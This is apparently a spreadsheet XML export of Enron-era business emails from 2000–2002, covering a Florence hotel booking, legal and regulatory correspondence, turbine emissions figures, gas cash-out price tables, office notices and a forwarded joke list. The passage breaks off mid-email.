RE: 03 double rooms with private bath and wc_x000D_
       from 09 to 11 October 2001 (02 nights)_x000D_
_x000D_
Thank you very much for your kind fax message of today and your preference._x000D_
_x000D_
We are glad to confirm on your behalf the above mentioned reservation at _x000D_
the rate of_x000D_
_x000D_
- Lit. 360.000 per room per night, buffet breakfast, air-conditioning, _x000D_
service charge and all_x000D_
   taxes included._x000D_
_x000D_
All our rooms are equipped with TV with CNN, private bath, direct _x000D_
dial-telephone, air- conditioning, hair dryer and double windows with _x000D_
double glasses._x000D_
Safe boxes and lift available._x000D_
_x000D_
Hotel City is centrally located, in the most ancient part of Florence, _x000D_
surrounded by the most interesting artistic and cultural sites. It is also _x000D_
ideal for shopping._x000D_
_x000D_
In order to guarantee your reservation, please confirm as soon as possible _x000D_
with a credit card number and expiration date._x000D_
_x000D_
Looking forward to the pleasure of your confirmation, we thank you very _x000D_
much in advance, and assuring you of our most attentive services for a _x000D_
pleasant stay in Florence and in our hotel, we remain with our_x000D_
_x000D_
Best regards,_x000D_
_x000D_
_x000D_
HOTEL CITY_x000D_
VIA SANT'ANTONINO 18 - 50123 FIRENZE (ITALY)_x000D_
Tel. ++39.055.21.15.43 Fax ++39.055.29.54.51_x000D_
E-mail: info@hotelcity.net_x000D_
http://www.hotelcity.net - http://www.hotelcityflorence.com </t>
  </si>
  <si>
    <t>Mon, 18 Jun 2001 09:17:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>Ina,_x000D_
_x000D_
John got a new phone and needs a shoulder rest_x000D_
_x000D_
dq</t>
  </si>
  <si>
    <t>Wed, 23 Aug 2000 10:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sharron.westbrook@enron.com'})</t>
  </si>
  <si>
    <t>Info for Accounting Offsite</t>
  </si>
  <si>
    <t xml:space="preserve">RSVP:  Yes, I will attend.  I will arrive in San Antonio in time for the _x000D_
dinner on Tuesday evening.  Count me out for golf on Wednesday - I don't _x000D_
think they would want me to play! _x000D_
_x000D_
Breakout Sessions:  SAP Reporting Issues_x000D_
        Analyst/Associates Program_x000D_
        (I will be glad to participate in any of the sessions, if there are _x000D_
needs to move anyone around) _x000D_
_x000D_
Top 4 Objectives for Accounting Group:  Streamline close process_x000D_
(from a Non-Accountant!!)     Implement data warehouse for flexible reporting_x000D_
        Increase visible participation in Analyst and Associate recruiting _x000D_
and          rotations_x000D_
        Asssure efficient service from COE (or its replacement),_x000D_
         providing timely, creative solutions and an extremely high          _x000D_
degree of excellence_x000D_
_x000D_
Dietary/Special Needs:    Something chocolate for dessert!!!        </t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 08:37:24 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lex.carroll@enron.com'})</t>
  </si>
  <si>
    <t>Year-to-date Deal Report</t>
  </si>
  <si>
    <t>Attached is the Year-to-date Deal Report through 11/21/01._x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
Lex Carroll_x000D_
Enron East Power Marketing, Inc._x000D_
Midwest Origination_x000D_
713-853-5426</t>
  </si>
  <si>
    <t>Wed, 6 Jun 2001 05:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Kay,_x000D_
_x000D_
A&amp;K did the title committment work and is now working on the Property _x000D_
Association Documents (as is Greenberg Traurig in West Palm Beach).  Ann _x000D_
Elizabeth's_x000D_
last email message to me before she went on vacation was that A&amp;K was the _x000D_
designated hitter for the Midway Project.    You have been copied on those _x000D_
docs which we desparately need to get to Cooney Midway Groves, the property _x000D_
owner.  As far as I know, they have not been involved in anything else _x000D_
related to Midway this year._x000D_
_x000D_
Christi left me a message saying that Lloyd Will or one of his guys needs to _x000D_
review the Interconnction Agreement. I do not know Lloyd._x000D_
_x000D_
Greg_x000D_
_x000D_
PS we had a good meeting with DERM on the landfill closure issues in the _x000D_
Certosa Holdings deal.   I'll try to reach you this afternoon to discuss.  _x000D_
_x000D_
_x000D_
 _x000D_
 -----Original Message-----_x000D_
From:  Mann, Kay  _x000D_
Sent: Wednesday, June 06, 2001 7:45 AM_x000D_
To: Krause, Greg_x000D_
Subject: RE: Midway Interconnect Agreement_x000D_
_x000D_
How much involvement has A &amp; K had on Midway?  I have other counsel engaged _x000D_
for the sale, but this falls into a different category.  _x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
From: Greg Krause/ENRON@enronXgate on 06/05/2001 11:35 PM_x000D_
To: Ben Jacoby/ENRON@enronXgate, Kay Mann/Corp/Enron@Enron_x000D_
cc: Christi L Nicolay/HOU/ECT@ECT _x000D_
_x000D_
Subject: RE: Midway Interconnect Agreement_x000D_
_x000D_
Please see attachment below with Christi's comments._x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Jacoby, Ben _x000D_
Sent: Tuesday, June 05, 2001 12:22 PM_x000D_
To: Mann, Kay_x000D_
Cc: Krause, Greg; Nicolay, Christi_x000D_
Subject: Midway Interconnect Agreement_x000D_
_x000D_
_x000D_
Kay:_x000D_
_x000D_
Greg has Christi's comments on the FPL Construction &amp; Connection Agreement, _x000D_
and he will be sending us those comments today in a marked document. Have we _x000D_
engaged outside counsel to review this agreement? I'd like to have a _x000D_
commercial / legal review fully completed, and then get accounting / finance _x000D_
to comment. I this something you were planning to have Carlos to work on _x000D_
given his recent work on ComEd and Ameren?_x000D_
_x000D_
Please let me know. Thanks._x000D_
_x000D_
Attached is the original generic form of FPL Connection and Construction _x000D_
Agreement for your reference._x000D_
_x000D_
Ben_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 &lt;&lt; File: FPL Construction  Connection Agreement Generic.doc &gt;&gt; _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 22 Aug 2000 03:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kate.fraser@enron.com'})</t>
  </si>
  <si>
    <t>Transport Model</t>
  </si>
  <si>
    <t xml:space="preserve">John,_x000D_
_x000D_
Do you have a few minutes tomorrow morning to discuss some transport model _x000D_
issues?  Any time would be fine with me.  I am leaving in a few minutes tosy _x000D_
to go to the doctor.  Let me know!_x000D_
_x000D_
Kate_x000D_
X34566_x000D_
</t>
  </si>
  <si>
    <t>Fri, 23 Feb 2001 09:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'john.march@rolls-royce.com'})</t>
  </si>
  <si>
    <t>frozenset({'lcampbe@enron.com'})</t>
  </si>
  <si>
    <t>Emissions</t>
  </si>
  <si>
    <t>Larry,_x000D_
_x000D_
I am attaching a graph that shows how the CO emissions increase exponentially_x000D_
(vppm) as the turbine operating power is lowered.  The 50% base load CO levels_x000D_
are between 215 and 250 vppm._x000D_
_x000D_
This graph also shows a wider ambient temperature range._x000D_
_x000D_
As stated on the phone today the 45 vppm NOx levels are achievable across the_x000D_
entire operating range._x000D_
_x000D_
I apologize for the SI units on the graph, but I ran out of time to convert _x000D_
the_x000D_
chart to imperial units, but hopefully it helps for you to understand the_x000D_
concept._x000D_
_x000D_
Call me at home this weekend, if you need anything._x000D_
_x000D_
--_x000D_
John A. March,  P.E._x000D_
Market Manager_x000D_
Rolls-Royce Energy Systems, Inc._x000D_
105 North Sandusky Street_x000D_
Mount Vernon, Ohio  43050_x000D_
U.S.A._x000D_
Phone:  740-393-8391_x000D_
Fax:  740-393-8781_x000D_
Email:  john.march@rolls-royce.com_x000D_
Home:  740-397-9187_x000D_
_x000D_
_x000D_
 - Emission curve to Larry Campbell 2-23-01.doc</t>
  </si>
  <si>
    <t>frozenset({'james.steffes@enron.com', 'tom.chapman@enron.com', 'richard.shapiro@enron.com'})</t>
  </si>
  <si>
    <t>GridSouth and Southern RTO Orders</t>
  </si>
  <si>
    <t>Rick  -- Attached is my list of rehearing issues for the Southern and _x000D_
GridSouth RTO orders that you requested. _x000D_
_x000D_
   _x000D_
_x000D_
Also included are summaries of GridSouth and Southern Orders._x000D_
_x000D_
  _x000D_
_x000D_
Jim, Tom and Christi -- Please send these to others that you think would like _x000D_
to see them.  Also, call me if you would like to discuss.</t>
  </si>
  <si>
    <t>Fri, 11 Jan 2002 14:32:28 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'max.doner@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'james.hungerford@enron.com'})</t>
  </si>
  <si>
    <t>Sitara price changes for December 2001</t>
  </si>
  <si>
    <t>James,_x000D_
_x000D_
Please change the prices in Sitara for December 2001 as follows:_x000D_
_x000D_
Deal No.	POI	Price_x000D_
_x000D_
643945		23059	$2.21055_x000D_
_x000D_
1057660	25412	$2.35241_x000D_
1057660	96251	$2.35241_x000D_
1057660	810160	$2.35241_x000D_
1057660	23059	$2.35241_x000D_
1057660	62137	$2.35241_x000D_
_x000D_
Thanks,_x000D_
Max</t>
  </si>
  <si>
    <t>Thu, 26 Oct 2000 04:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'barbara.hueter@enron.com', 'jeffrey.keeler@enron.com', 'richard.ingersoll@enron.com', 'sue.nord@enron.com', 'vinio.floris@enron.com', 'marcie.milner@enron.com', 'rubena.buerger@enron.com', 'stephen.burns@enron.com', 'terri.miller@enron.com', 'geriann.warner@enron.com', 'steve.walton@enron.com', 'cynthia.sandherr@enron.com', 'tom.briggs@enron.com', 'patrick.keene@enron.com', 'robert.hemstock@enron.com', 'tom.chapman@enron.com', 'joe.hillings@enron.com', 'robert.neustaedter@enron.com', 'tom.hoatson@enron.com', 'lindsay.meade@enron.com', 'sarah.novosel@enron.com', 'bill.moore@enron.com', 'dan.staines@enron.com', 'lisa.yoho@enron.com', 'marcia.linton@enron.com', 'mary.hain@enron.com', 'lora.sullivan@enron.com', 'kerry.stroup@enron.com', 'amy.fabian@enron.com', 'frank.rishe@enron.com', 'chris.long@enron.com', 'lysa.akin@enron.com', 'marchris.robinson@enron.com', 'ginger.dernehl@enron.com', 'mona.petrochko@enron.com', 'paul.kaufman@enron.com', 'steve.montovano@enron.com', 'richard.shapiro@enron.com', 'chauncey.hood@enron.com', 'kirsten.bellas@enron.com', 'aleck.dadson@enron.com', 'allison.navin@enron.com', 'damon.harvey@enron.com', 'jeff.brown@enron.com', 'joseph.alamo@enron.com', 'leslie.lawner@enron.com', 'scott.bolton@enron.com', 'steven.kean@enron.com', 'ron.mcnamara@enron.com', 'xi.xi@enron.com', 'janine.migden@enron.com', 'kathleen.sullivan@enron.com', 'charles.yeung@enron.com', 'harry.kingerski@enron.com', 'susan.mara@enron.com', 'kathy.mongeon@enron.com', 'howard.fromer@enron.com', 'tracy.cooper@enron.com', 'robert.frank@enron.com', 'linda.lawrence@enron.com', 'jean.dressler@enron.com', 'tom.delaney@enron.com', 'joe.allen@enron.com', 'lara.leibman@enron.com', 'gloria.ogenyi@enron.com', 'nancy.hetrick@enron.com', 'susan.landwehr@enron.com', 'daniel.allegretti@enron.com', 'robin.kittel@enron.com', 'elizabeth.linnell@enron.com', 'carolyn.cooney@enron.com', 'thane.twiggs@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'bernadette.hawkins@enron.com', 'sandra.mccubbin@enron.com', 'christi.nicolay@enron.com', 'maureen.mcvicker@enron.com', 'donald.lassere@enron.com', 'roy.boston@enron.com', 'joe.connor@enron.com', 'joe.hartsoe@enron.com', 'laurie.knight@enron.com'})</t>
  </si>
  <si>
    <t>DOE-NARUC North American Summit on Harmonizing Business Practices_x000D_
 in Energy Restructuring: Early Registration Deadline</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
gngr_x000D_
713-853-7751_x000D_
----- Forwarded by Ginger Dernehl/NA/Enron on 10/26/2000 11:14 AM -----_x000D_
_x000D_
	"DOE-NARUC Summit Team" &lt;ibarreto@caem.org&gt;_x000D_
	10/25/2000 06:57 AM_x000D_
	Please respond to ibarreto_x000D_
		 _x000D_
		 To: "North American Summit Stakeholder" &lt;ibarreto@caem.org&gt;_x000D_
		 cc: _x000D_
		 Subject: DOE-NARUC North American Summit on Harmonizing Business Practices _x000D_
in Energy Restructuring: Early Registration Deadline_x000D_
_x000D_
_x000D_
DOE and NARUC are hosting the North American Summit on Harmonizing Business_x000D_
Practices in Energy Restructuring on November 29 to December 1 in Dallas._x000D_
More information is available at http://www.energymarkets.org._x000D_
_x000D_
Just a quick note to remind you that the early registration discount_x000D_
deadline is Friday, October 27.  To register, go to_x000D_
http://www.naruc.org/Meetings/NA_Summit/registration.htm._x000D_
_x000D_
Please forward this email to colleagues who may be interested in this event._x000D_
_x000D_
_x000D_
 - winmail.dat</t>
  </si>
  <si>
    <t>Fri, 18 Feb 2000 10:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'debbie.brackett@enron.com'})</t>
  </si>
  <si>
    <t>Reference credits for Credit Trading</t>
  </si>
  <si>
    <t xml:space="preserve">Mark,_x000D_
_x000D_
Attached are lists of the reference credits who have been approved by the _x000D_
Credit group for Credit Trading. This list was based on the agreement between _x000D_
Bill and Bryan that all reference credits posess an investment grade rating. _x000D_
Call if you have questions._x000D_
</t>
  </si>
  <si>
    <t>Thu, 13 Jul 2000 06:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Precious</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Judy Hernandez/HOU/ECT on 07/13/2000 _x000D_
01:12 PM ---------------------------_x000D_
_x000D_
_x000D_
Judy Hernandez on 08/25/99 02:56:43 PM_x000D_
To: Shauncy Mathews/HOU/ECT@ECT, Shirlet Williams/HOU/ECT@ECT, David _x000D_
Edwards/HOU/ECT@ECT, Andrea Warren/HOU/ECT@ECT, Lisa Shoemake/HOU/ECT@ECT, _x000D_
Rose Botello/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: FW: Precious_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Judy Hernandez/HOU/ECT on 08/25/99 02:54 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Maria Sandoval_x000D_
08/25/99 01:56 PM_x000D_
To: Andrea R Guillen/HOU/ECT@ECT, Brenda Barreda/HOU/AZURIX@AZURIX, Pamela _x000D_
Conner/HOU/ECT@ECT, Phenicia Olivier/HOU/ECT@ECT, Elizabeth Soto/HOU/ECT@ECT, _x000D_
Melissa Rodriguez/HOU/ECT@ECT, Melba Lozano/HOU/ECT@ECT, Cassandra S _x000D_
Dutton/HOU/ECT@ECT, Judy Hernandez/HOU/ECT@ECT, Alex Saldana/HOU/ECT@ECT, _x000D_
Chantelle Villanueva/HOU/ECT@ECT, Irena D Hogan/HOU/ECT@ECT, Ana _x000D_
Correa/HOU/ECT@ECT, Cecilia Olvera/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: FW: Precious_x000D_
_x000D_
This is cute........_x000D_
---------------------- Forwarded by Maria Sandoval/HOU/ECT on 08/25/99 01:53 _x000D_
PM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  Yolanda Sandoval &lt;Yolanda.Sandoval@Halliburton.com&gt;                    _x000D_
       08/25/99 01:43 PM_x000D_
	_x000D_
_x000D_
To: "'Castillo, Margaret'" &lt;MCastillo@metromkt.com&gt;, Maria _x000D_
Sandoval/HOU/ECT@ECT, Ursula Tovar &lt;Ursula.Tovar@Halliburton.com&gt;, Patty _x000D_
Soria &lt;Patty.Soria@Halliburton.com&gt;_x000D_
cc:  _x000D_
Subject: FW: Precious_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Yolanda Sandoval_x000D_
KBR Legal Dept._x000D_
713-753-5986_x000D_
yolanda.sandoval@halliburton.com_x000D_
_x000D_
_x000D_
-----  &lt;&lt;Microsoft PowerPoint 97&gt;&gt;_x000D_
_x000D_
 - precious.pps_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 11:42:32 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jonathan.mckay@enron.com', 'leonidas.savvas@enron.com', 'frank.vickers@enron.com', 'scott.goodell@enron.com', 'victoria.versen@enron.com', 'f..keavey@enron.com', 'vladi.pimenov@enron.com', 'judy.townsend@enron.com', 'scott.neal@enron.com', 'andrea.ring@enron.com', 'w..pereira@enron.com', 'maureen.smith@enron.com', 'f..brawner@enron.com', 'john.hodge@enron.com', 'craig.taylor@enron.com', 'chris.germany@enron.com', 'chuck.ames@enron.com', 'brad.mckay@enron.com'})</t>
  </si>
  <si>
    <t>FW: Cash Out Indices - November 2001</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	CustomerNotices, WGPHOU [mailto:WGPHOU.CustomerNotices@Williams.com] _x000D_
Sent:	Monday, November 26, 2001 1:31 PM_x000D_
Subject:	Cash Out Indices - November 2001_x000D_
_x000D_
November 26, 2001_x000D_
_x000D_
To:  Transcontinental Gas Pipe Line Corporation Customers_x000D_
     and Shippers_x000D_
_x000D_
Re:  Cash Out Indices - November 2001_x000D_
     _x000D_
_x000D_
_x000D_
    FT                   AVG.          BUY        SELL_x000D_
  ------                ------        ------     ------_x000D_
  Zone 1                2.4525        2.0750	    2.9650  	_x000D_
  Zone 2                2.4863        2.1075     2.9975_x000D_
  Zone 3                2.5200        2.1400     3.0300_x000D_
  Zone 4                2.5338        2.1522     3.0461_x000D_
  Zone 5                2.5950        2.2060     3.1172_x000D_
  Zone 6                2.6445        2.2495     3.1747_x000D_
_x000D_
    IT                   AVG.          BUY        SELL_x000D_
  ------                ------        ------     ------_x000D_
  Zone 1                2.4525        2.0750     2.9650  	_x000D_
  Zone 2                2.4863        2.1075     2.9975_x000D_
  Zone 3                2.5200        2.1400     3.0300_x000D_
  Zone 4                2.5745        2.1929     3.0868_x000D_
  Zone 5                2.7807        2.3917     3.3029_x000D_
  Zone 6                2.9387        2.5437     3.4689_x000D_
_x000D_
   FTG                   AVG.          BUY        SELL_x000D_
  ------                ------        ------     ------_x000D_
  Zone 1                2.4525        2.0750     2.9650  	_x000D_
  Zone 2                2.4863        2.1075     2.9975_x000D_
  Zone 3                2.5200        2.1400     3.0300_x000D_
  Zone 4                2.6016        2.2200     3.1139_x000D_
  Zone 5                2.9045        2.5155     3.4267_x000D_
_x000D_
                         AVG.          BUY        SELL_x000D_
                        ------        ------     ------_x000D_
  FTNT                  2.5375        2.1500     3.0500_x000D_
_x000D_
_x000D_
For information concerning cash out transactions, please contact_x000D_
Casilda Vasquez at (713)215-4504._x000D_
_x000D_
Stella Yu_x000D_
Manager - Rate Systems_x000D_
(713)215-3381</t>
  </si>
  <si>
    <t>Thu, 28 Dec 2000 02:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sandi.braband@enron.com'})</t>
  </si>
  <si>
    <t>Revised Diamond Settlement Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Gerald Nemec/HOU/ECT on 12/28/2000 10:52 AM -----_x000D_
_x000D_
	Gerald Nemec_x000D_
	12/20/2000 11:16 AM_x000D_
		 _x000D_
		 To: Jack Simunek/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Revised Diamond Settlement Agreement_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 2 Jan 2002 08:21:58 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'khara@avistaenergy.com'})</t>
  </si>
  <si>
    <t>frozenset({'e-mail &lt;.cabo@enron.com&gt;', 'e-mail &lt;.meg@enron.com&gt;', 'cara.semperger@enron.com', 'diana.scholtes@enron.com', 'e-mail &lt;.stephanie@enron.com&gt;'})</t>
  </si>
  <si>
    <t>FW: oops</t>
  </si>
  <si>
    <t>_x000D_
Subject: Fwd: oops_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt;&gt;Men are like....Laxatives. They irritate the shit_x000D_
&gt; &gt; &gt; out of you._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Men are like.....Bananas. The older they get, the_x000D_
&gt; &gt; &gt; less firm they are._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Men are like.....Vacations. They never seem to be_x000D_
&gt; &gt; &gt; long enough._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Men are like.....Bank Machines. Once they withdraw_x000D_
&gt; &gt; &gt; they lose interest._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Men are like.....Weather. Nothing can be done to_x000D_
&gt; &gt; &gt; change them._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Men are like.....Blenders. You want one, but_x000D_
&gt; &gt; &gt; you're not quite sure why._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Men are like.....Cement. After getting laid, they_x000D_
&gt; &gt; &gt; take a long time to get hard._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Men are like.....Chocolate Bars. Sweet, smooth,_x000D_
&gt; &gt; &gt; and they usually head right for your hips._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Men are like.....Coffee. The best ones are rich,_x000D_
&gt; &gt; &gt; warm, and can keep you up all night long._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Men are like.....Commercials. You can't believe a_x000D_
&gt; &gt; &gt; word they say._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Men are like.....Department Stores. Their clothes_x000D_
&gt; &gt; &gt; are always half off._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Men are like.....Government bonds. They take so_x000D_
&gt; &gt; &gt; long to mature._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Men are like.....Horoscopes. They always tell you_x000D_
&gt; &gt; &gt; what to do and are usually wrong._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Men are like.....Mascara. They usually run at the_x000D_
&gt; &gt; &gt; first sign of emotion._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Men are like.....Popcorn. They satisfy you, but_x000D_
&gt; &gt; &gt; only for a little while._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Men are like.....Snowstorms. You never know when_x000D_
&gt; &gt; &gt; they're coming, how many inches you'll get or how long it will last._x000D_
&gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Men are like.....Lava Lamps. Fun to look at, but_x000D_
&gt; &gt; &gt; not very bright._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Men are like.....Parking Spots. All the good ones_x000D_
&gt; &gt; &gt; are taken and the rest are handicapped._x000D_
&gt; &gt; &gt;_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
__________________________________________________________________x000D_
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp.</t>
  </si>
  <si>
    <t>Mon, 13 Nov 2000 00:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mandy.bowles@email.moore.com'})</t>
  </si>
  <si>
    <t>hey, just wanted to say thanks for dinner last night since I hadn't told_x000D_
ya._x000D_
i had a great time with you, as usual._x000D_
thanks.</t>
  </si>
  <si>
    <t>Tue, 6 Feb 2001 08:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rufino.doroteo@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'rosalyn.lum@enron.com', 'kristi.fredericks@enron.com', 'stephen.wolfe@enron.com', 'brian.dawson@enron.com', 'lisa.best@enron.com', 'stacy.hardy@enron.com', 'laynie.east@enron.com', 'tammy.barta@enron.com', 'susan.rance@enron.com', 'lisa.kang@enron.com', 'dana.davis@enron.com', 'brad.carey@enron.com', 'brian.schwertner@enron.com', 'lisa.king@enron.com'})</t>
  </si>
  <si>
    <t>i have a doctors appointment tomorrow morning and will be in around 9 or 10.  _x000D_
dana will be here to assist you while i'm gone._x000D_
_x000D_
rufino</t>
  </si>
  <si>
    <t>Thu, 17 Jan 2002 00:36:16 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/16/02; HourAhead hour: 23;  HourAhead schedule download failed. Manual intervention required._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002011623.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6 Dec 2000 06:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>WTI trading simulation model - presentation</t>
  </si>
  <si>
    <t xml:space="preserve">Vince,_x000D_
_x000D_
Since you are not here today, I just sent out the presentation of the model I _x000D_
prepared for John _x000D_
for his feedback.  I would appreciate that you review it before we make the _x000D_
final version. _x000D_
_x000D_
Obviously, this simulation model is going to make a big impact on our online _x000D_
trading.  And I am happy_x000D_
that we have accomplished this task effciently and elegantly. _x000D_
_x000D_
_x000D_
Zimin_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Zimin Lu/HOU/ECT on 12/06/2000 01:25 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Zimin Lu_x000D_
12/06/2000 01:21 PM_x000D_
To: John J Lavorato/Corp/Enron@Enron_x000D_
cc: Stinson Gibner/HOU/ECT@ECT, Vince J Kaminski/HOU/ECT@ECT _x000D_
Subject: WTI trading simulation model - presentation_x000D_
_x000D_
_x000D_
_x000D_
John,_x000D_
_x000D_
I put together a presentation of the simulation model for WTI market maker _x000D_
for you. _x000D_
The P/L results are investigated by assuming different scenarios._x000D_
_x000D_
The key variable is the number of trade per day, therefore is varied  from _x000D_
200 to 1000 trades._x000D_
_x000D_
Scenarios are generated by different spreads, net open position allowed, and _x000D_
time period._x000D_
_x000D_
Take a look what I have prepared, and let me know things you want to add or _x000D_
delete._x000D_
If you have any questions, I will be happy to discuss with you._x000D_
_x000D_
_x000D_
_x000D_
Zimin_x000D_
_x000D_
PS: this presentation is only for the open-close trading.  I will produce _x000D_
exact the same_x000D_
sequence for the continuous trading (close-close) once you approve the _x000D_
content._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 28 Feb 2001 01:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: 2/23 Confirms not sent by T/D + 1</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Gerald Nemec/HOU/ECT on 02/28/2001 09:50 AM -----_x000D_
_x000D_
	Russell Diamond/ENRON@enronXgate_x000D_
	02/28/2001 09:36 AM_x000D_
		 _x000D_
		 To: Ellen Wallumrod/NA/Enron@ENRON, Bob Bowen/HOU/ECT@ECT_x000D_
		 cc: Janie Aguayo/HOU/ECT@ECT, Veronica Espinoza/ENRON@enronXgate, Gerald _x000D_
Nemec/HOU/ECT@ECT_x000D_
		 Subject: FW: 2/23 Confirms not sent by T/D + 1_x000D_
_x000D_
Ellen, Bob,_x000D_
_x000D_
Please confirm the AEC Marketing (USA) transaction (TAGG# 5176.1) as OK for _x000D_
Credit Approval.  Gerald Nemec in ENA Legal is preparing a special confirm _x000D_
for this transaction.  Please coordinate with him._x000D_
_x000D_
Russell_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Aguayo, Janie  _x000D_
Sent: Tuesday, February 27, 2001 1:51 PM_x000D_
To: Reeves, Leslie_x000D_
Cc: Keiser, Kam; Guggenheim, Victor; Love, Phillip; Logan, Jackson; Royed, _x000D_
Jeff; Olitsky, Sandy; Gossett, Jeffrey; Bike, Anne; Walker, Chris; Wolfe, _x000D_
Jason; McLaughlin, Errol; Vargas, Laura; Scott, Susan; Johnson, Luchas; _x000D_
Dawson, Sherry; Brant Reves/HOU/ECT@ENRON; Espinoza, Veronica; Russell _x000D_
Diamond/HOU/ECT@ENRON; Mendoza, Nidia; Schneider, Brad; Lebrocq, Wendi; _x000D_
Campbell, Lesli; Jackson, Steve; Gossett, Jeffrey; Agua [Diamond, Russell]  ) _x000D_
yo, Janie; Bailey, Derek; Hunter, Larry Joe; Theriot, Kim; Blay, Jennifer; _x000D_
Wallumrod, Ellen; Radous, Paul; Williams, Jason R.; Guidroz, Walter; Johnson, _x000D_
Rudwell; Tanya Rohauer/HOU/ECT@ENRON; Boudreau, Kara; Stafford, Patrick; _x000D_
Michelle Nelson/Corp/Enron@ENRON; Range, Stewart; Sharma, Shifali; Dutton, _x000D_
Keynan; Sorenson, Jefferson; Huan, George_x000D_
Subject: 2/23 Confirms not sent by T/D + 1_x000D_
_x000D_
The below is a list of Friday, Feb 23 deals in which the Confirm was not sent _x000D_
to C/P by Feb 26(T/D + 1)._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 2 Jul 2001 14:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'roy.boston@enron.com'})</t>
  </si>
  <si>
    <t>Illinois Power and ISU</t>
  </si>
  <si>
    <t>Rick -- FYI on Illinois State University_x000D_
----- Forwarded by Roy Boston/HOU/EES on 07/02/2001 11:24 AM -----_x000D_
_x000D_
_x000D_
=09Roy Boston 06/29/2001 03:57 PM =09   To: Eric Pitcher, Tim Nowaczyk/HOU/=_x000D_
EES@EES  cc: Janine Migden/NA/Enron@Enron, Harry Kingerski, jsteffe@enron.c=_x000D_
om, Barb Novak/HOU/EES@EES  Subject: Illinois Power and ISU=09_x000D_
_x000D_
_x000D_
Eric and Tim -- This is a note to bring you up to date on my attempts to re=_x000D_
solve the ISU/IP issue.  As you are aware, IP has threatened to impose a re=_x000D_
troactive standby charge to Illinois State University, our customers, if it=_x000D_
 uses its on site generation for peak shaving purposes this summer.  When I=_x000D_
SU was an IP customer, the utility did not impose such charges, but noe tha=_x000D_
t they have lost their PPO and have reverted to SC21 this was made an issue=_x000D_
._x000D_
_x000D_
I spoke with Kathy Patton last week and told her the situation.  She respon=_x000D_
